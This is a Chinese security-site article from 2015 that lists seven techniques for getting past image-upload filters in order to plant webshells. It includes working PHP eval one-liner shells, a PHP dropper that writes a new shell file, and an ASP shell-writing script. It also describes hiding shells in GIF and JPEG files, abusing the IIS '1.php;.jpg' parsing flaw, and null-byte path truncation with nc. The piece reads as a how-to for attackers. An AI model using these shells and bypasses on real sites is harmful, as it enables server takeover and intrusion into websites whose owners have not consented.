频道栏目
首页 > 安全 > 网站安全 > 正文
上传图片shell的绕过过滤的几种方法
2015-02-03 10:07:03         来源:qxzxp.com  
收藏   我要投稿

 一般网站图片上传功能都对文件进行过滤,防止webshell写入。但不同的程序对过滤也不一样,如何突破过滤继续上传?

本文总结了七种方法,可以突破!

1、文件头+GIF89a法。(php)//这个很好理解,直接在php马最前面写入gif89a,然后上传dama.php

2、使用edjpgcom工具向图片注入代码。(php)//edjpgcom修改,加入php一句话保存为dama.php

3、cmd命令下copy 图片.GIF+shell.php webshell.php (php) //估计和1是同样的原理,欺骗上传webshell.php

4、C32asm打开图片在文件末尾空一格加入代码<?php eval($_POST[cmd])?> 。(php)//填充php一句话然后上传。

5、在4基础上改进代码<?php fputs(fopen(“error.php”.”w”).”<?eval(\$_POST[cmd]);?>”)?> 。(php)//同目录下生成error.php,提问:asp的怎么改写?

回答:asp测试的结果是:没有权限…

<%
Set MyFileObject=Server.CreateObject(“Scripting.FileSystemObject”)
Set MyTextFile=MyFileObject.CreateTextFile(“kafei.asp”)
MyTextFile.WriteLine(“\<\%eval request(chr(35))\%\>”)
MyTextFile.Close
%>

6、IIS解析目录名漏洞1.php;.jpg (jpg) //这是文件名变量没有过滤。

7、nc抓包改数据 //路径名和文件名没有过滤。

//通过抓包修改上传路径通过/upload/1.asp+空格,使用软件把空格填充为00。然后nc提交获取webshell。

点击复制链接 与好友分享!回本站首页
相关TAG标签 方法 图片
上一篇:ThinkPHP 3.0~3.2 SQL注入漏洞详解与利用
下一篇:入侵渗透卖信封骗子站
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站